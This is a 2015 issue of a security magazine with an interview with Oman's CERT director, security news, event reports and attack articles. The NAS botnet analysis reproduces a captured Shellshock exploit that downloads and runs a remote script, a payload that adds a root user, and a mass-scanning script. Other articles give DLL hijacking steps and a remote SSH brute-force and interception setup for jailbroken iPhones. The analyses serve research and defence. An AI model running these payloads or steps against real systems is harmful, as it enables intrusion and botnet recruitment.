Security Kaizen Magazine, Issue 18

Vol.5 Issue 18 Jan. - Feb. 2015

2015

The Best Is Yet To Come Cairo Security Camp 2014 5 years of Success Interview with Badar Ali Al Salehi General Director At OMAN National CERT

www.bluekaizen.org

Regional Cyber Security Summit 2015 Towards the Future of Cyber Attacks Muscat,Oman ,Al Bustan Palace

March 29- 30, 2015

Confirmed Speakers

Eng Badar Al Salehi, Director General, Oman National CERT Head of ITU Regional Cyber Security Center

Maarten Van Horenbeeck President at FIRST

Omar Sherin Head of CIIP-Qcert

Organized By

Georgia Weidman Bulb Security LLC-Founder

Issue 18 | www.bluekaizen.org | 2

www.bluekaizen.org

Contents

Interviews 5 Interview with Mr.Badar Ali Al Salehi,

Information Technology Authority - ITA

Grey Hat 7 10 13

DLL Hijacking Attacking Jailbroken iDevices NAS Botnet Revealed

General Director – OMAN National CERT

New & News

16 Bluekaizen News

20 Cairo Security Camp 2014

19 Regional Cyber Security Summit 2015

Reviews 24

AndroidOS_GEINIMI analysis report Malware Review

Best Practice 37

Defining a Proactive Security Monitoring Strategy

Win32:DarkSeoul-C, Trojan.Win32.EraseMBR.b

28 Malware Review 31

Manual Source Code Review Code Review Review

Issue 18 | Securitykaizen Magazine | 3

39 Information Security Is

a Challenge in The Middle East

www.bluekaizen.org

Editor’s Note

It is customary with each New Year, that everyone set his plans and his resolution with the mere hope of improvement or better yet a new beginning. Usually we are filled with positive feelings and an inner boost that keeps us going till the year’s end. I will try this year to enter with a more enthusiastic (though it will be hard) approach, I will try not to set the bar real high this time and for this I have to thank everyone who helped me with their words and encouragement, everyone I see fighting and still standing in his area, young geeks with their never ending ideas, and the list goes on… I guess what I am trying to say is, you should all take this as an opportunity to see new possibilities, to see the glass half full, to join a group of positive people and do not let the negative vibes get you. This March, Bluekaizen is contributing in organizing the regional cyber security summit in OMAN with the help of OMAN CERT. On a different note I want to congratulate Ahmed Mohamed for the hack zone project and hope you can all support him to let his dream comes to life. Those kind of initiates that keeps the positive energy in us

Also we are now preparing for the interviews of Bluekaizen Chapters, so if you are interested please fill out the form that should have been published on Bluekaizen Facebook Page. This year we are planning to establish a more solid and organized chapters with clear duties and responsibilities so that we can reach as much people as we can # spread the word #Bluekaizenchapters 2015

Magazine Team Chairman & Editor-in-Chief Moataz Salah Editor Mohamed H.Abdel Akher Contributors BK team Khaled Sakr Nipun Jaswal Senad Aruc Ehab Abdel Monem Abdulrahman Hesham Shaikh Rashid Harris D. Schwartz Abdul Rehman Website Development Mariam Samy Marketing Coordinator Mahitab Ahmed Distribution Ahmed Mohamed Design Mohamed A.El-Maghraby

Security Kaizen is issued Bi-Monthly Reproduction in Whole or part without written permission is strictly prohibited ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG For Advertisement In Security Kaizen Magazine & www.bluekaizen.org Website E-mail info@bluekaizen.org Or Phone: +2 0100 267 5570 +971 5695 40127

Bluekaizen Founder Issue 18 | www.bluekaizen.org | 4

www.bluekaizen.org

Interviews

Interview with Mr. Badar Ali Al Salehi General Director – OMAN National CERT Information Technology Authority - ITA Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?

My name is Badar Al-Salehi . I am the General Director of Oman National CERT which is the e-Oman national initiative aiming at addressing cyber security risks, Developing local cyber security capabilities within the sultanate of Oman, building cyber security awareness program of public and private sector organizations, Securing critical national infrastructure and key industries within the general public and ICT users.

BK Team

WWW.Bluekaizen.org Issue 18 | Securitykaizen Magazine | 5

I joined ITA at the early establishment of this Authority in 2006 and since then I have been working in different national information security and critical infrastructure related projects. I am also a member of different regional and international forums and committees including GCC CERT and OIC-CERT steering committee member and the Oman CERT representative for the Forum of incident response and security teams (FIRST). I am an advisory board member at the college of modern Science and member of the Ministry of manpower Committee reviewing IT curriculum. I have been speaking and panelling at several regional and international ICT and cyber security forums, summits and conferences .Before joining ITA, I was also playing different senior roles at the Sultan Qaboos University and the Municipality of Muscat looking after the critical infrastructures and systems as well as information security where I worked on the first initiative in Oman on establishing an information security management system within the government

What is the main role of Oman Cert? OCERT’s mission is to Developing cybersecurity capabilities to increase the capacity of security incident detection and emergency responses to such incidents and also to ensure, ensure cyber-security awareness in public and private sector organizations, including citizens and residents

What is the Regional cyber Security Center? How it is established? And what is its vision and mission? Towards achieving its goal of safe cyberspace across the globe, The ITU Arab Regional Cyber Security Center (ITUARCC) is established by the International Telecommunication Union (ITU) and the Omani Government, represented by the Information Technology Authority through its collaboration with International Multilateral Partnership against Cyber Threats (IMPACT) with a vision of creating a safer and cooperative cybersecurity environment in the Arab Region and strengthening the role of ITU in building confidence and security in the use of information and communication technologies in the region. In line with the objectives of the ITU Global Cyber security Agenda (GCA), and the ITU-IMPACT initiative, ITU-ARCC will act as ITU’s cybersecurity hub in the region localizing and coordinating cybersecurity initiatives. ITU-ARCC is hosted, managed and operated by Oman National CERT (OCERT). The Centre is designed to cater for the cybersecurity needs of the Arab Region. The Centre was officially launched on the 3rd of March 2013 at the Oman National CERT in Muscat. What are the main services provided by ARCC? ITU-ARCC services offers a variety of cybersecurity services to meet the difficult challenges of fighting cyber threats and to support the center’s aim. These services align and agree with ITU Global Cybersecurity Agenda (GCA) which intends to enhance the confidence and security in the information society. The GCA was launched on 17th May 2007 for international cooperation and strategies to improve global cybersecurity posture . ITU-ARCC provides the following services: •Cybersecurity Strategy and Governance •Cybersecurity Assurance & Compliance •Cybersecurity Capacity Building •Emergency Incident Response •Technical Services and Information Sharing full collaboration and sharing information against cyber

Can you give us more information about the Regional Cyber Security Summit 2015? Information Technology Authority represented by Oman National CERT (OCERT) is hosting the Regional Cyber Security Summit, in cooperation with the International Telecommunication Union (ITU), IMPACT and Bluekaizen on 29th – 30th of March in Muscat, Oman. The Regional Cyber security Summit in 2015 focuses on future expected threats and measures, also aims at connecting public, private and academic sectors with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss, formulate strategic directions and plans to tackle emerging threats to the global and regional Security sector. The conference is targeting different CERTs in the Arabic region, Chief Security Officers and strategic positions in different organizations either from Oman or Arab countries. Security professionals from all over the world are welcome to submit their talks before 20th of February, if they are interested to present in the fourth version of RCSS For more information you can check the summit website. www.regionalcybersecuritysummit.com What do you think is the greatest achievement for ARCC in 2014? The next years ITU-ARCC will focus on designing and implementing national cybersecurity strategies for Arab countries to achieve significant improvement in the security posture. In addition, ITU-ARCC will conduct and implement cybersecurity measures in region. What are your wishes for the Arabic region in the Information Security field? The main purpose of ITU-ARCC is to support the member states of Arab Region in developing and improving cybersecurity through the development of sound cybersecurity policies and capabilities, building human capacity, developing related tools, applications, templates, procedures and manuals. ITU-ARCC wishes to uniting and strengthening cybersecurity initiatives and programs to improve cybersecurity posture in Arab region against cyber threat through regional cooperation. Issue 18 | www.bluekaizen.org | 6

www.bluekaizen.org

Grey Hat

DLL Hijacking Introduction In this article I would like to discuss DLL Hijacking attack, due to its impact and ease of exploit. The article we will go through the concept of DLL Hijacking, then how to exploit systems using DLL hijacking in simple steps, then will introduce a demo of exploiting a vulnerable program.

DLL & DLL Hijacking Let’s first understand what is DLL and what is it’s usage,a DLL is an abbreviation for Dynamic link library. DLLs are libraries that contain shared functions used by executable files at runtime, as an example an application that displays a MessageBox that says “Simple MessageBox” , what actually happens inside this application that it loaded a built-in DLL called “User32.dll” inside this DLL it executes a function that is calledMessageBoxA (eg.MessageBoxA(0,“Simple MessageBOX”,MB_ OK“);(see Figure below).

Khaled Sakr

Information security engineer at security Meter Issue 18 | Securitykaizen Magazine | 7

the flow that the application takes to load a DLL at runtime is first the windows try to locate the DLL location, to achieve this the windows searches a well-defined set of directories in a particular orderas described in DLL Search Order, based on that logic If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory, This is called DLL Hijacking so If the Application does not find the legitimate DLL before searching the compromised directory, it will load the malicious DLL. Like this we can use DLL Hijacking to perform remote code execution or even Privilege escalation if the vulnerable program runs as administrator

DLL Hijacking in a few steps

So what are the steps to perform a successful DLL hijacking attack?. 1.Targeting a certain application. 2.Monitoring DLLs that are loaded by this application. 3.Find the search order for the DLLs 4.Target a DLL where you can put your malicious DLL to run before the legitimate DLL, or better Target an unavailable DLL for example VulnDLL.dll . 5.Find out which function this DLL is executing for example executeme() 6.Write a code you want to be executed when the DLL loads and put the code inside a function executeme(). 7.Compile the code to shared library and name it VulnDLL.dll

Let’s Crack Some Systems

•Results Contain NAME NOT FOUND Great now we have a smaller list of targets To choose from, any one of these DLL’s can Be vulnerable to DLL Hijacking so lets pick One, for example “IPHLPAPI DLL”

in this part I’ll show a Demo on how to perform a successful DLL Hijacking Attack.in this Demo we will target tftp32.exe application. you can find a list of applications reported to be vulnerable to DLL Hijacking On the following link: http://www.exploit-db.com/dllhijacking-vulnerable-applications/ So let’s start the fun part!!! as discussed we need to get the list of DLLs that get loaded in runtime when the application starts, this can be achieved easily using Procmon.exe tool, so just start your application and add the following filter in procmon,

•Process Name is tftp32.exe •Path ends with DLL These filters will get us all entries related to the process tftp32.exe and all DLL files it’s trying to load so now lets target a DLL we can notice in the results column in procmon that there are columns that state “NAME NOT FOUND”, which means that the system is trying to load the DLL but it can’t find it so these are the perfect DLL to target. So lets add another filter

As discussed the application load the DLL to execute a function existing inside this DLL , so now the next step, we have to figure out which function inside this DLL the application needs, with a little bit of reversing using IDA we can obtain this information, I was able to get the function name using static reversing only, in some other cases you will need to reverse the application in run time to obtain the function name, now lets start reversing.

Issue 18 | www.bluekaizen.org | 8

As discussed the application load the DLL to execute a function existing inside this DLL , so now the next step, we have to figure out which function inside this DLL the application needs, with a little bit of reversing using IDA we can obtain this information, I was able to get the function name using static reversing only, in some other cases you will need to reverse the application in run time to obtain the function name, now lets start reversing. In case of this application it will be very trivial just load the application with IDA •open the “strings” subview and search for the Target DLL IPHLPAPI DLL(see Figure below)

•double click on it so it gives you reference to where it’s used in the assembly code (see Figure below).

So as you have all guessed by now the only step remaining is •Write a code we want to get executed when the vulnerable application run •Insert this code inside a function called SendARP(), •Compile this code into a shared library(DLL) and call it IPHLPAPI.DLL” , • Insert it in a path where the system looks for it and we will get our self a back door or a remote code execution on the system. Just to demonstrate I will write a code that open a MessageBox that displays to the user “DLL Hijacked”, below is a code snippet.

Simple explanation for the code is that when the DLL is called (DLL_PROCESS_ATTACH) , execute SendARP() Function. Finally eachtime the program run this function will get executed. Instead of just opening a message Box you can use this vulnerability to get the victim reverse connect to you and probably get a permanent shell or backdoor on the box ,or even better you can get a Meterpteter session if you insert the right code inside SendARP() function.

Summary we can see that a string was defined by the value “IPHLPAPI.DLL” (db ‘“IPHLPAPI.DLL”) we can see where this string value is used in the code if we double clicked on DATA XREF: .rdata:004283EC (see figure below).

On the address where the target DLL is referenced we can find that it import a function called SendARP(),we don’t need to know what this function does, we only need to know it’s name.

Issue 18 | Securitykaizen Magazine | 9

So now we know how to exploit DLL hijacking vulnerabilities, what about remediating them? In a few points let’s see some recommended solution From development perspective 1.always use fully specified Path name in the C functions LoadLibrary() or LoadLibraryEX() 2.Consider removing the current directory from the standard search path by calling the C Function SetDllDirectory with an empty string (“”). From System hardening prespective 3.Make sure the registry key SafeDllSearchMode value is set to ‘1’ this places the user’s current directory later in the search order (HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Control\Session Manager\ SafeDllSearchMode) As a matter of fact the below is not really a complete solution as for some reason Microsoft has a feature “DLL Local Redirection”, where if an application name is abc.exe and you created a folder called “abc.exe.local”, this will force the application to search all DLL it needs from this local folder first even if it was specified using LoadLibraryEX(“Path to DLL”) .So if you think of it, this can make all applications vulnerable to DLL hijacking Attacks.

www.bluekaizen.org

Grey Hat

Attacking Jailbroken iDevices Introduction Apple based iDevices are continually jail-broken in order to expand service capabilities. However, most of the people do not know the consequences that come alongside. Hackers and Security Enthusiasts can easily breach jail-broken device and can install malicious proxies remotely on the victimized device. Today, we will be discussing the same procedure that hackers use in order to leverage their attacks onto the target device and we will look at the possible vulnerability patch for the same.

Nipun Jaswal

Chief Cyber Security Architect Issue 18 | www.bluekaizen.org | 10

Requirements In order to carry out this attack efficiently, a hacker would require following tools-Burp Suite (For Certificate Generation) -WSCP Client (Copying and Downloading files from remote device) -Hydra (Brute Force for SSH) -PList Editor (Editing PList Files) - Putty(Terminal for Remote Device)

Procedure

We can see that we have•HTTPEnable=0 •HTTPProxyType=0 •HTTPSEnable=0 If we alter these three values above, we can set the proxy configuration on the device automatically. However, if we set HTTPProxyType to 1 it will use the proxy details as type ‘HTTP’ and if we set it to 2 it will use the proxy details as type ‘SOCKS’. Let us modify this configuration file

Most of the people who possess jail-broken iDevices do not know about the open ( ssh) port of the device. Hence, this makes them vulnerable to known password attack or due to the default password that is in most cases is ‘alpine’. However, if the user is little techy and have chosen to change the default password, Hydra-a brute force tool can help you find the correct password of the device. After Logging in through SSH using putty , we can fetch the preferences file of the device located at the following path: /private/var/preferences/Sys temConf iguration/ preferences.plist Using WinSCP client , we can download the above file to the system and can view its contents using PList Editor Software

Figure 2 Proxy Configuration

Altering the above values will result in the following proxy configuration of the device as follows

Figure 1 No Proxy Details

Issue 18 | Securitykaizen Magazine | 11

Figure 3 Automatic Proxy Configuration

Hence, we can see the proxy details showing up in the manual configuration of the device.

Installing Cert on the device Wait; to find out the HTTPS/SSL enabled data from applications like twitter, gmail and facebook, we need to install the root CA certificate on the device as well. The locations of certificate details are present at the following path/private/var/mobile/Library/ConfigurationProfiles Let us see what files are contained in this directory before certificate installation

We need four files from /private/var/mobile/Library/ ConfirgrationProfiles•Cert •PayloadDependency.plist •PayloadManifest.plist •ProfileTruth.plist Let us replace these files with the ones from our device as follows

Figure 6 Device After Copying Cert Files

Next, we can respring the device and see if the certificate is installed or not Figure 4 Device before Certificate Install

In addition, the interface does not contain any option for profiles before they are installed

Figure 7 Device properties after Cert Install

Figure 5 Device Properties Before Cert Install

Now what we can do easily is we can install the certificate on our own iDevice using burpsuite and copy its files to this device.

We can see that Profile is now the part of general properties of the device. Hence, we configured an MITM proxy remotely and the certificate too. Therefore, we can easily capture the device SSL traffic and analyze it for vital pieces of information. References http://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/ http://www.putty.org http://winscp.net/eng/download.php http://plist-editor-for-windows.software.informer.com/ http://portswigger.net/Burp/help/proxy_options_installingCAcert.html

Issue 18 | www.bluekaizen.org | 12

www.bluekaizen.org

Grey Hat

Nas Botnet Revealed About the security researcher Multiple Certified ISMS Professional with 10-year background in IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Skills include written and verbal communications in 6 different languages. Currently holding a Senior Security Specialist position at Reply s.p.a - Communication Valley - Security Operations Center. Responsible for advanced security operations. We present findings in addition to the work in the following analyses. Worm Backdoors and Secures QNAP Network Storage Devices https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061 Shellshock Worm Exploiting Unpatched QNAP NAS Devices https://threatpost.com/shellshock-worm-exploiting-unpatchedqnap-nas-devices/109870

Senad Aruc

A little ShellShock fun http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun. html

Senior Lead at Security Operations Issue 18 | Securitykaizen Magazine | 13

This is what we found, missing pieces from previous researches

the attackers are sending a GET request with Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from Internet, this payload contains a SH script with very clever design logic specially build for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point the attacker is building persistence with autorun.sh script inside the compromised NAS device. Another interesting founding is that attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this attacker prevents other hackers to own the already hacked NAS device. Adding a “‘request” user with root privileges into the “passwd” and “shadow” file is classical approach to own a Linux machine. The real aim of this massive hack is, at the script “armgH.cgi” that attacker is downloading and installing into the compromised machine. This CGI Backdoor prepares the NAS to become an armed device ready for DDOS. The whole attack schematic is design to be continuous with auto pilot mode. So far we managed to detect more than 500+ compromised devices.

à Massive Attack > Deploying Payload > Patching against Shellshock (persistence) > Arming > Deploy the scanner >

Details Attack Exploit detected from our IDS devices. GET /cgi-bin/authLogin.cgi HTTP/1.1 Host: 127.0.0.1 User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p / share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/ S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 500HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 2250 Date: Sat, 13 Dec 2014 22:09:42 GMT Server: header”>HTTP Status 404 - /cgi-bin/authLogin.cgi

Payload - Hosted in compromise server! #!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/ bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY os=`uname -m` ip=xxx.14.xx.xx #wget -P /tmp/ http:// qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh # # fold=/share/MD0_DATA/optware/.xpl/ if [[ “$os” == ‘armv5tel’ ]]; then wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgibin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp /home/httpd/cgibin/exo.cgi ${fold}.exo.cgi sleep 1 Search=”request” Files=”/etc/passwd” if grep $Search $Files; then e c h o “$Search user its just added!” else echo “request:x:0:0:request:/share/homes/admin:/bin/ sh” >> /etc/passwd echo ‘request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::’ >> /etc/shadow #inst patch wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/ Qfix/ShellshockFix_1.0.2_20141008_all.bin #inst scan sfolder=”/share/HDB_DATA/.../” url69=”http://xxx.14.xx.79/run”

Issue 18 | www.bluekaizen.org | 14

Arming the NAS devices for DDOS attacks. Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability. Output from - Reverse engineering analyses. PRIVMSG %s :* .exec <commands> - execute a system command PRIVMSG %s :* .version show the current version of bot PRIVMSG %s :* .status show the status of bot PRIVMSG %s :* .help show this help message PRIVMSG %s :* *** Scan Commands PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you PRIVMSG %s :* .advscan <a> <b> scan with d-link config reset bug PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random PRIVMSG %s :* .advscan->recursive scan local ip range with d-link config reset bug PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random PRIVMSG %s :* .advscan->random scan random ip range with d-link config reset bug PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random PRIVMSG %s :* .advscan->random->b scan local ip range with d-link config reset bug PRIVMSG %s :* .stop stop current operation (scan/dos) PRIVMSG %s :* *** DDos Commands: PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing, PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86 PRIVMSG %s :* .spoof <ip> set the source address ip spoof PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation) PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation) PRIVMSG %s :* *** IRC Commands: PRIVMSG %s :* .setchan <channel> set new master channel PRIVMSG %s :* .join <channel> <password> - join bot in selected room PRIVMSG %s :* .part <channel> part bot from selected room PRIVMSG %s :* .quit kill the current process

Issue 18 | Securitykaizen Magazine | 15

Screenshot from hacked NAS device with deployed payload can be controlled via CGI web backdoor http://X.X.X.X:8080/cgi-bin/exo.cgi

Mass scanner for Shellshock This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded port scanner to search and hack for other vulnerable Qnap NAS devices. #!/bin/sh ## xXx@code 3-12-2014 rand=`echo $((RANDOM%255+2))` #url=”” url=”http://1xx.xx.xx.xx/S0.sh” download=”/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n” get=”GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n” ./pnscan -rQDoc -w”$get “-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &

www.bluekaizen.org

New & News

News A peek under the hood to the recent security breaches ICANN has been hacked The internet cooperation for assigned names and numbers has been hacked by unknown attackers that allowed them to access some of the organization’s systems. ICANN said Spoofed emails pretended as internal ICANN communications to its staff members. The link in the emails took the staff to bogus login page, where they provided their usernames and passwords with the keys to their work email accounts. “We believe a ‘spear phishing’ attack was initiated in late November 2014,” Tuesday’s press release stated. “It involved email messages that were crafted to appear to come from our own domain being sent to members of our staff. The attack resulted in the compromise of the email credentials of several ICANN staff members.” ICANN Said According to ICANN, The hackers was able to successfully access a number of systems within ICANN, including the Centralized Zone Data System (CZDS), the wiki pages of the ICANN Governmental Advisory Committee (GAC), the domain registration Whois portal, and the ICANN blog.

BK Team

WWW.Bluekaizen.org

“Based on our investigation to date, we are not aware of any other systems that have been compromised, and we have confirmed that this attack does not impact any IANArelated systems,” ICANN stated. Issue 18 | www.bluekaizen.org | 16

Thid Scenario

Google discloses three unpatched security Vulnerabilities in Windows in less than one month Google Project zero team has found three zero day vulnerabilities in windows. Google project zero team often finds vulnerabilities in different products in different companies and if the team succeeded to find a vulnerability, then it get reported to the affected software vendors within the limit of 90 days. After the deadline of 90 days, Google automatically disclose the vulnerability to the public.

The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. “The issue is the implementation in CNG.sys doesn’t check the impersonation level of the token when capturing the logon session ID (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session,” James Forshaw says in the post disclosing the vulnerability. “Thisbehaviour of course might be design, however not having been party to the design it’s hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client”. https://code.google.com/p/google-security-research/issues/ detail?id=128

U.S. and U.K. have announced plans to stage cyber War Games on each other

The First Scenario Google security researcher “ james Forshaw” has discovered a privilege escalation vulnerability in Windows 8.1 that could allow a hacker to modify contents or even to take over victims’ computers completely, leaving millions of users vulnerable.

The Second Scenario According to Google’s security team, User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because normal user requires administrator privileges to do so. “However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through,” Google said. “Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn’t something that only happens during the initial provisioning of the local profile.” Google said

Issue 18 | Securitykaizen Magazine | 17

The United States and the U.K. will stage cyber “war games” together, starting this year, to boost both countries’ resistance to cyberattacks, Britain’s government said on 15 of January The US and the UK are planning a series of joint war games involving cyber-warriors from either side attacking each other to ramp up their cyberdefences. The FBI and the National Security Agency will be involved, along with Britain’s GCHQ and MI5 intelligence and security agencies. The Two Governments will simulate attacks on banks, financial sectors in London and U.S. and British governments, commercial banks. The U.K. said that there will be more exercises to test the resilience of national infrastructure. The two governments also plan to team up on a new program to train a new generation of “cyber agents,” officials said. The program will fund students from both countries to search cybersecurity for up to six months expected to start in the academic year that begins in 2016 Closer co-operation to improve cybersecurityon both sidesdue toconcerns about vulnerabilities in the wake of devastating cyber-attack on Sony Pictures that the U.S. has blamed on North Koreawhich led to the early release of a number of films and publication of embarrassing private correspondence

and personal data.. In another incident, the Twitter and YouTube accounts of the U.S. military’s Central Command were compromised earlier by hackers claiming to support the Islamic State militant group. http://www.bbc.com/news/uk-30842597

Chinese Hackers Stole F-35 Data – Snowden Leaks Edward Snowden, a former NSA employee, releases a document that reveals industrial-scale cyberespionage operation of China to learn the secrets of Australia’s next front-line fighter aircraft – the USbuilt F-35 Joint Strike Fighter (JSF). Chinese spies allegedly stole as much as 50 terabytes of data, including the details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gases and the method the jet uses to track targets. Snowden reveals

Emotet Banking German Users

Malware

targets

A new variant in the Win32/Emotet family is targeting banking credentials with a new spam email campaign. The emails include fraudulent claims, such as fake phone bills, and invoices from banks or PayPal.Microsoft says The malware, identified as Emotet, has been discovered by HeungSoo Kang of Microsoft’s Malware Protection Center. The center was able to identify a sample of the spam email message that was written in German, including a link to a compromised website. This indicates that the campaign primarily targeted mostly German-language speakers and banking websites. Emotet is able to pull credentials from a variety of email programs including Outlook, Mozilla’s Thunderbird and instant messaging programs such as Yahoo messenger and windows live messenger. On infected machines,Emotet downloads a configuration file which contains a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic. All the stolen information is sent back to Emotet’s “command and control (C&C) server where it is used by other components to send spam emails to spread the threat,” Kang wrote. “We detect the Emotet spamming component as Spammer:Win32/ Cetsiol.A.”

So far, the F-35 Lightning II JSF is the most expensive defense project in the US history. The fighter aircraft, manufactured by US-based Lockheed Martin, was developed at a cost of around $400 billion (£230 billion).Reports the BBC on the case. The documents leaked by Snowden also revealed that NSA spying operation on China’s espionage agencies. According to the documents, the NSA hacked into the computer of a senior Chinese military official and stole information about Chinese intelligence targets in the US government and other foreign governments.

http://blogs.technet.com/b/mmpc/archive/2015/01/06/ emotet-spam-campaign-targets-banking-credentials.aspx

Issue 18 | www.bluekaizen.org | 18

www.bluekaizen.org

New & News

Regional Cyber Security Summit 2015 Towards the future of cyber Attacks ITU Arab Regional Cyber Security Center is organizing the fourth Regional Cyber Security Summit in cooperation with Bluekaizen. The Information Technology Authority through Oman National CERT (OCERT) hosts the summit on March 29th – 30th at Muscat, Oman. The last decade has demonstrated a significant change to the international security. The rapidly evolving cyber warfare techniques and emerging threats to government functions, industry, commerce, healthcare, social communication and personal information, has created a whole new security environment that gets more dangerous over time. Preparing for future security threats has become inevitable; security tools and techniques must evolve to better protect the data. The moment we think we

Issue 18 | Securitykaizen Magazine | 19

are safe, is the moment we are faced with irrefutable damages. The Regional Cyber security Summit in 2015 focuses on future expected threats and measures, also aims at connecting public, private and academic sectors with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss, formulate strategic directions and plans to tackle emerging threats to the global and regional Security sector.

www.bluekaizen.org

New & News

Cairo Security Camp 2014 5 years of sharing knowledge 5 years of Success The largest information security Conference of its type in The Middle East and North Africa was held in the period of 25th -29th November 2014 gathering IT professionals and security practitioners from throughout the region in order to improve the information security field in the MENA region and to share different views in different information security topics. After 4 years of holding CSCAMP, The fourth version of CSCAMP2014 was a little bit different. This year we increased the activities to include Job Fair, Security Kaizen Congress, Security awards and others,beside two conference rooms: one of them is only for technical sessions (Security Kaizen Labs room) and the other for different security topics. And as usual a challenge for capture the flag (CTF).

BK Team

WWW.Bluekaizen.org Issue 18 | www.bluekaizen.org | 20

This year the conference included different discussion sessions covering different aspects of information security domain including Malware analysis, forensics, and advanced topic in security and case studies. A set of the remarkable sessions in advanced topics and case studies were presented one of them was presented by Omar sherin, CIIP Manager in Q-CERT, discussing technical challenges and active threats facing the critical infrastructures in different countries through a small practical experiment. Also a unique session was presented by Tim Willis from Google about debugging the internet. Another Advanced session was about Mobile forensics which was covered by Adel Abdelmoneim regarding the fundamentals of digital forensics with a special focus on mobile devices, Through many practical examples participants will know how to extract information (Facebook Info, WhatsApp, SMS , Images and EXIF information ‌Etc) from the suspect device. Special Training also was held in the period of 25th -27th November about Advanced Android and IOS Hands-on Exploitation that was covered by AseemJakhar,Director, Research, Payatu Technologies http://payatu.com .This training was taking a deep dive into all the components of Android operating system starting right from the ARM assembly, shellcoding, buffer overflows, OS security, App security model, reverse engineering to App security and exploitation.

Issue 18 | Securitykaizen Magazine | 21

Mr. Tim Willis

Another interesting topic was “The Usual Rants� which was presented by Aseem Jakhar focusing on simple issues that are plaguing the industry. Common myths and old beliefs which need to change for a better and secure Enterprise world.

The CTF (Capture the Flag) was a major part in CSCAMP2014. CTF contests was designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. Reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which have been required by prior CTF contests at Cairo Security Camp.

Pre-qualification was based on 4 levels that CTF players were able to procceed within a time frame of 3 days. The challenges were being divided into several types of challenges as follows: 1-Web 2-Exploitation 3-Reversing 4-bonus round Two teams were playing at the final round at Cairo Security Camp. The winning team was balalaika cr3w with a score of 2100 points and the second winning team was Null with a 1050 points. Mr. Aseem Jakhar

A new set of sessions was newly introduced during this year conference which coveredThe Security Challenge facing Banking Electronic Channels introduced by Osama Hiji and Anatomy of the Financial Malware session that was presented By Dr. Ahmed Shosha.

As final conclusion the conference this year wasunique in its variety of topics covered specially the financing malwares, also the innovated techniques in threat analysis and forensics were very interestingin introducing handson and efforts done in threatanalysis and forensics, Case studies and best practices were also introduced and as every year conferenceadvanced topics and debate sessions that wereintroduced opens new aspects for infosec specialists in Egypt&Arab world.

balalaika cr3w team

Issue 18 | www.bluekaizen.org | 22

www.bluekaizen.org

Reviews

Malware Review

